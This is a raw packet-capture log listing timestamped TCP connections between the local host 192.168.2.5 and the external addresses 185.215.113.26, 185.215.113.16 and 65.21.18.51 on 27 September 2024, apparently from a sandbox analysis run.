Sep 27, 2024 04:21:10.484196901 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484256983 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484256983 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484358072 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484369993 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484380960 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484392881 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484404087 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484416962 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484441996 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484477043 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484477043 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484505892 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484517097 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484528065 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484539032 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484549999 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484559059 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484563112 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484612942 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484697104 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484709024 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484715939 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484719038 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484730005 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484740973 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484752893 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484765053 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484774113 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484798908 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484798908 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484836102 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484846115 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484858036 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484880924 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484880924 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484904051 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484920979 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484931946 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484942913 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484955072 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484957933 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484957933 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484999895 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484999895 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.485137939 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.485148907 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.485160112 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.485172033 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.485183954 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.485193968 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.485212088 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.485212088 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.485405922 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.540009975 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540028095 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540039062 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540050983 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540069103 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540081024 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540095091 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540105104 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540117025 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540144920 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.540144920 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.540210009 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.540241957 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540252924 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540263891 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540275097 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540292025 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540302038 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540311098 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.540314913 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540361881 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540364027 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.540410995 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.540416002 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540427923 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540438890 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540474892 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.540503979 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.540504932 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.540518999 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540530920 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540541887 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540558100 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540571928 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.540636063 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540646076 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540657043 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540668964 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540678978 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.540694952 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.540694952 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.540694952 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.540747881 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.573812962 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.573837996 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.573852062 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.573864937 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.573875904 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.573894978 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.573899031 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.573908091 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.573918104 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.573930025 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.573942900 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.573966980 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.573987961 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.573999882 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574004889 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574004889 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574016094 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574026108 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574054003 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574106932 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574116945 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574122906 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574129105 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574134111 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574141026 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574182034 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574233055 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574244976 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574253082 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574256897 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574263096 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574275017 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574327946 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574340105 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574351072 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574362040 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574373960 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574383974 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574394941 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574394941 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574465036 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574476004 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574486971 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574489117 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574496984 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574510098 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574521065 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574533939 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574533939 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574554920 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574567080 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574584007 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574644089 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574656010 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574657917 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574666977 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574678898 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574693918 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574704885 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574753046 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574764013 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574775934 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574788094 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574789047 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574830055 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574875116 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.574919939 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574932098 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574943066 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574954033 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574966908 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574978113 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.574995995 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575007915 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.575007915 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.575009108 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575047970 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.575134039 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.575156927 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575169086 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575181007 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575193882 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575205088 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575222015 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575233936 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575234890 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.575234890 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.575252056 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.575301886 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575314999 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575333118 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575335026 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.575346947 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575359106 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575370073 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575381041 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575382948 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.575390100 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.575447083 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.575447083 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.575454950 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575551033 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575562954 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575572968 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575584888 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575596094 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.575680017 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.575915098 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.607172966 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.607192039 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.607203960 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.607217073 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.607227087 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.607295036 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.607374907 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.630806923 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.638228893 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:11.215032101 CEST	49719	45580	192.168.2.5	65.21.18.51
Sep 27, 2024 04:21:11.220057011 CEST	45580	49719	65.21.18.51	192.168.2.5
Sep 27, 2024 04:21:11.220212936 CEST	49719	45580	192.168.2.5	65.21.18.51
Sep 27, 2024 04:21:11.235897064 CEST	49719	45580	192.168.2.5	65.21.18.51
Sep 27, 2024 04:21:11.240842104 CEST	45580	49719	65.21.18.51	192.168.2.5
Sep 27, 2024 04:21:11.517872095 CEST	49715	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:11.522948027 CEST	80	49715	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:11.523030996 CEST	49715	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:11.533970118 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:11.538921118 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:11.539407969 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:11.607685089 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:11.612598896 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:11.874959946 CEST	45580	49719	65.21.18.51	192.168.2.5
Sep 27, 2024 04:21:12.067449093 CEST	49719	45580	192.168.2.5	65.21.18.51
Sep 27, 2024 04:21:12.148644924 CEST	49719	45580	192.168.2.5	65.21.18.51
Sep 27, 2024 04:21:12.153629065 CEST	45580	49719	65.21.18.51	192.168.2.5
Sep 27, 2024 04:21:12.438265085 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.438293934 CEST	45580	49719	65.21.18.51	192.168.2.5
Sep 27, 2024 04:21:12.438395023 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.440484047 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.445255041 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.583748102 CEST	45580	49719	65.21.18.51	192.168.2.5
Sep 27, 2024 04:21:12.583815098 CEST	49719	45580	192.168.2.5	65.21.18.51
Sep 27, 2024 04:21:12.657468081 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.657555103 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.657565117 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.657577038 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.657577038 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.657591105 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.657603979 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.657618046 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.657629967 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.657629967 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.657645941 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.657650948 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.657650948 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.657660961 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.657674074 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.657685041 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.657711983 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.657711983 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.657746077 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.662414074 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.662436008 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.662477016 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.662477016 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.662563086 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.662672043 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.781965017 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.781982899 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.781996012 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.782007933 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.782027006 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.782032967 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.782082081 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.782088995 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.782097101 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.782109022 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.782130003 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.782207966 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.782536983 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.782586098 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.782598019 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.782641888 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.782648087 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.782660961 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.782669067 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.782674074 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.782708883 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.782737970 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.783355951 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.783391953 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.783402920 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.783471107 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.783471107 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.783483028 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.783495903 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.783503056 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.783560038 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.783560038 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.784400940 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.784411907 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.784477949 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.784506083 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.784553051 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.784554958 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.784621000 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.906107903 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.906122923 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.906136036 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.906147957 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.906157970 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.906177044 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.906179905 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.906179905 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.906266928 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.906316996 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.906337976 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.906347990 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.906362057 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.906383038 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.906395912 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.906420946 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.906420946 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.906420946 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.906672001 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.906686068 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.906697989 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.906712055 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.906723022 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.906761885 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.906761885 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.906761885 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.906923056 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.907215118 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.907227993 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.907238960 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.907254934 CEST	80	49720	185.215.113.16	192.168.2.5
